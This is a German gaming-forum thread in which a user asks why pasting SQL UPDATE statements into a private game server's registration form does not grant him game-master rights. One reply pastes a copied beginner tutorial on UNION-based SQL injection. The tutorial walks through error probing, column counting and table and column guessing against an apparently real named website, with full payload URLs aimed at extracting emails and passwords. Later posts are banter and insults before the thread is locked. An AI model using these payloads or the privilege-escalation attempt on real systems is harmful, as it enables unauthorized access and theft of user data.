Sql Injectionen

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Sql Injectionen

    Hallo ich habe ein kleines problem
    es gibt ja diesen schönen thread von Frucht
    der diese sql injectionen aufgelistet hatte

    so
    nun wollt ich das mal auf dem server XXXXX[unbekannt] usen ...

    so dann geb ich bei Username :

    Quellcode

    1. USE [CHARACTER_01_DBF]
    3. UPDATE CHARACTER_TBL SET m_chAuthority='Z'
    4. WHERE m_szName='xxx' and serverindex='01'
    6. USE [ACCOUNT_DBF]
    8. UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='P'
    9. WHERE account='xxx' and gamecode='A000'
    11. [xxx = unbekannt also nicht freigegeben -> für euch egal xD]
    Alles anzeigen


    ein so pw mach ich dann auch ein normales pw usw...
    so dann captcha frage eingeben
    so dann auf register klicken

    dann kommt dan


    Quellcode

    1. Ein unbekannter Fehler ist aufgetreten!


    das wäre normal der code für gm rechte bekommen...

    könnte mir jemand sagen wieso oder weshalb das nicht funktioniert ?
    an den sonderzeichen liegt es ja anscheinend nicht sonst würde es ja dort stehen oder ?


    bitte um hilfe

    mfg. Kiya

  • Werbung zur Unterstützung des Forums ( Bitte AddBlocker deaktivieren )

  • [FONT="Comic Sans MS"][COLOR="Green"][SIZE="2"]bei einem guten Captcha funktionieren 90% der Injections nicht.
    Und wenn du sowieso keine Ahnung von der Materie hast, empfehl ich dir mal paar Tuts zu lesen, und dich mal bisschen mehr in der Szene aufzuhalten.

    GreetZ
    PsYcH0TiK    [/SIZE][/COLOR][/FONT]

  • Also
    Das ist keine sql injection sondern ganz normale sql befehle.

    Hier mal ein nettes tut das ich aus einem anderen forum kopiert habe.Mir hat es schon viel geholfen es ist zwar lang aber es lohnt sich damit auseinander zusetzen, da es dir schonmal bei einfachen injections hilft danach würde ich mit blind injections weiter machen.
    "hier"
    Ich erkläre SQL-Injections hier mal für Einsteiger.

    Ich fange einfach direkt an.Ich stoße beispielsweise auf diese Seite:

    Code:

    EMO-TRANS Startseite

    img5.imagebanana.com/img/c1k8rem5/tut1.JPG

    Nun hänge ich ein Hochkomma an die news_id um zu sehen ob SQL-Queries ausgeführt werden.

    Code:

    EMO-TRANS Startseite'



    Wie ihr seht, wird ein Fehler ausgegeben.Hierbei richtet sich das Hauptaugenmerk auf die Ausgabe:

    Code:

    MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

    Diese besagt uns, dass die SQL-Befehle ausgeführt werden.Somit gehen wir an die nächste Aufgabe: Dem Herausfinden der Anzahl der Columns.

    Dazu benutzen wir die Order-By-Methode.Mit Order-By lassen wir die Columns orden nach dem Alphabet oder was auch immer.

    Wir beginnen einfach mal mit order+by+100--

    Code:

    ContentBoxX Error: Database Fatal Error (MySQL)


    Hauptaugenmerk hierbei :
    Code:

    Unknown column '100' in 'order clause'


    Für jeden der ein bisschen Englisch kann ist klar: Es gibt keine 100 Columns.

    Also müssen wir uns langsam herantasten, da dies mit Bildern zu viel wäre gehe ich direkt an den Schritt wo man weiss, wie viele es sind.

    Wenn ihr folgendes probiert:
    Code:

    ContentBoxX Error: Database Fatal Error (MySQL)

    Wird euch wieder ausgegeben, dass es keine Column 20 gibt.Probiert ihr aber:
    Code:

    EMO-TRANS Startseite

    Ist die Seite normal dargestellt,daher wissen wir, dass es 19 Columns gibt, da 19 der letzte true-Wert ist.

    Nun wissen wir es sind 19 Columns, weiter mit dem Union+Select-Befehl
    .Mit Union erreichen wir alle Tabellen, und sind nicht auf eine angewiesen, also immer Union vorran!Mit Select wird einfach selektiert - logisch? logisch!.

    Also gehen wir nun auf die Seite und verwenden fehlerhafter Weise, 18 Columns!

    Code:

    [url=http://www.emo.de/de/index.php?news_id=35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--]ContentBoxX Error: Database Fatal Error (MySQL)[/url]


    Wird rein gar nichts ausgegeben.Verwenden wir aber den Befehl mit 19 Columns - also mit der richtigen Anzahl sieht es so aus:

    Code:

    [url=http://www.emo.de/de/index.php?news_id=35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--]EMO-TRANS Startseite[/url]

    img5.imagebanana.com/img/jk3j28fi/tut4.JPG


    Wie ihr seht befindet sich auf der Seite eine 5 und eine 7.Das sind unsere Ausgabestellen.Hier lassen wir uns später den gewünschten Datenbankeintrag anzeigen.

    Erstmal überprüfen wir die MySql Version - dies ist wichtig für den weiteren Verlauf der Injection.


    Dazu benutzen wir den Befehl version(), dies geschieht natürlich an einer Stelle wo wir uns etwas ausgeben lassen können (5 oder 7).Ich nehme einfach mal die 5.

    Code:

    [url=http://www.emo.de/de/index.php?news_id=35+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19--]EMO-TRANS Startseite[/url]



    Wie ihr seht erscheint nun auf der Seite 4.1.21 - also benutzt die Seite MySql Version 4.Dies ist für Injections unvorteilhafter - dazu aber später mehr.

    Nun versuche ich auf die Tabelle users zuzugreifen.

    Code:

    [url=http://www.emo.de/de/index.php?news_id=35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--]ContentBoxX Error: Database Fatal Error (MySQL)[/url]


    img5.imagebanana.com/img/bxxhhw9/tut6.JPG

    Wie ihr seht, existiert diese Tabelle nicht, also müssen wir weiter raten.

    Nachdem ich ein wenig getestet habe probiere ich auch den Tabellennamen newsletter aus.

    Code:

    [url=http://www.emo.de/de/index.php?news_id=35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+newsletter--]EMO-TRANS Startseite[/url]



    Und? Kein Fehler.Was heisst das?
    Es gibt eine Tabelle mit dem Namen newsletters!


    Nun will ich natürlich auch eine Spalte(Column) auslesen, also teste ich ob es eine mit dem Namen email funktioniert.


    Code:

    [url=http://www.emo.de/de/index.php?news_id=35+union+select+1,2,3,4,email,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+newsletter--]ContentBoxX Error: Database Fatal Error (MySQL)[/url]




    Aber wie ihr seht existiert diese Spalte nicht, also probiere ich wie schon bei den Tables weiter, ich teste einfach mal customers_email
    *.

    Code:

    [url=http://www.emo.de/de/index.php?news_id=35+union+select+1,2,3,4,customers_email,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+newsletter--]ContentBoxX Error: Database Fatal Error (MySQL)[/url]

    img5.imagebanana.com/img/8aw0tbt7/tut9.JPG


    *Die Column customers_email existiert nicht(ich habe noch keine existierende entdeckt), ich habe das Bild bearbeitet - so würde die fertige Injection aussehen.Dies geht natürlich bei anderen Seiten auch mit der Tabelle users und der Column password.

    Wichtiges was ihr wissen solltet, statt dem Pluszeichen (+) könnt ihr auch ein Leerzeichen oder die Zeichenfolge /**/ benutzen.

    Die Zeichenfolge -- beendet den Querie, Alternative hierfür /*

    Nun wisst ihr wir ihr an die Columns kommt und wie ihr eine Column aus einer bestimmten Table auslest.

    Syntax:
    Code:

    yoursite.com/news_id=12+union+…ME,4,5,6+from+TABLENAME--


    Ein MySQL Fehler muss nicht immer in dieser Form (ContentBoxx) ausgegeben werden, oft ist es nur Text!



    Hoffe ihr habt den einstieg gelernt, bei Fragen,Lob,Kritik einfach posten.
    Kopieren erlaubt - Ändern verboten!
    Nur mit Quellangabe verbreiten!



    Viel Spaß

  • Das Video ist hammer! Twilight, bist du der dicke? :)

    Wenn das nicht workt, was du machen willst, lass es doch einfach.
    Du hast nichts damit zu tun, wer es nicht versteht soll es lassen, außerdem ist das ein Gamingforum und hat damit eigentlich nur indirekt etwas zu tun, aber lediglich im Bereich Security zur Behebung der Lücke.
    Also entweder selbst lernen oder garnicht. Außerdem ist das keine Sql Injection, lediglich ein Fehler bei MSSQL - PHP.

  • yojo:PA;77533 schrieb:

    Das Video ist hammer! Twilight, bist du der dicke? :)

    Wenn das nicht workt, was du machen willst, lass es doch einfach.
    Du hast nichts damit zu tun, wer es nicht versteht soll es lassen, außerdem ist das ein Gamingforum und hat damit eigentlich nur indirekt etwas zu tun, aber lediglich im Bereich Security zur Behebung der Lücke.
    Also entweder selbst lernen oder garnicht. Außerdem ist das keine Sql Injection, lediglich ein Fehler bei MSSQL - PHP.


    Ich bin Dragan, bin schon 13 Jahre alt.
    Und manche sagen, ich bin schon sehr, sehr alt. xD

    Btw, da sind 2 Dicke.
    Björn und Dragan o_o

  • [FONT="Comic Sans MS"][COLOR="White"][SIZE="2"]ninpa.de/Video
    Ich kenne das Video seit langem xD .

    Ich bin 13 Jahre alt und aus dem Kosovo



    @Kira/Twilight
    Ich bin Dragan, bin schon 13 Jahre alt.
    Und manche sagen, ich bin schon sehr, sehr alt. xD

    Heißt es nicht "Ich bin Lori"



    Ist alles gesagt : D Ich hoffe [COLOR="Blue"]Invitation[/COLOR] closed das mal : D    [/SIZE][/COLOR][/FONT]

  • naja gut
    da ja anscheinend sich immer über andere lustig machen
    und sich dadurch im internet cooler fühlen
    kann das hier geclosed werden
    sowas versteh ich einfach nicht wie man so drauf sein kann ey ?
    jeder hat mal fragen
    und ihr möchtegern gangster hier hattet auch mal fragen
    und wusstet auch nicht direkt alles !
    also lasst demnächst eure miesen kommentare den jeder hat fragen
    und dafür ist das da wenn ich kommentare ablassen wollt geht zu eurer familie
    und sacht den sowas mal ins gesicht -.-


    kann geclosed werden und die gangster hier *wissen bescheid wer .....*
    sollten in zukunft mist kommentare vermeiden ! nur um ihre postanzahl zu erhöhen !

  • [FONT="Comic Sans MS"][COLOR="Green"][SIZE="2"]

    Kiya;77559 schrieb:

    kann geclosed werden und die gangster hier *wissen bescheid wer .....*
    sollten in zukunft mist kommentare vermeiden ! nur um ihre postanzahl zu erhöhen !


    Wenn du mich damit meinst, hast du meine Gefühle zutiefst verletzt.... !!!111einself    [/SIZE][/COLOR][/FONT]

  • Kiya;77559 schrieb:

    naja gut
    da ja anscheinend sich immer über andere lustig machen
    und sich dadurch im internet cooler fühlen
    kann das hier geclosed werden
    sowas versteh ich einfach nicht wie man so drauf sein kann ey ?
    jeder hat mal fragen
    und ihr möchtegern gangster hier hattet auch mal fragen
    und wusstet auch nicht direkt alles !
    also lasst demnächst eure miesen kommentare den jeder hat fragen
    und dafür ist das da wenn ich kommentare ablassen wollt geht zu eurer familie
    und sacht den sowas mal ins gesicht -.-


    kann geclosed werden und die gangster hier *wissen bescheid wer .....*
    sollten in zukunft mist kommentare vermeiden ! nur um ihre postanzahl zu erhöhen !



    Ups, redeste grade etwa von dir, du kleiner Betrüger? "Ey Alter guck disch doch in das Spiegeln an Alter, und dann erst posten eyyyyy!!"

  • [FONT="Times New Roman"]

    yojo:PA;77533 schrieb:

    Das Video ist hammer! Twilight, bist du der dicke? :)

    Wenn das nicht workt, was du machen willst, lass es doch einfach.
    Du hast nichts damit zu tun, wer es nicht versteht soll es lassen, außerdem ist das ein Gamingforum und hat damit eigentlich nur indirekt etwas zu tun, aber lediglich im Bereich Security zur Behebung der Lücke.
    Also entweder selbst lernen oder garnicht. Außerdem ist das keine Sql Injection, lediglich ein Fehler bei MSSQL - PHP.

    Reicht das?
    -locked[/FONT]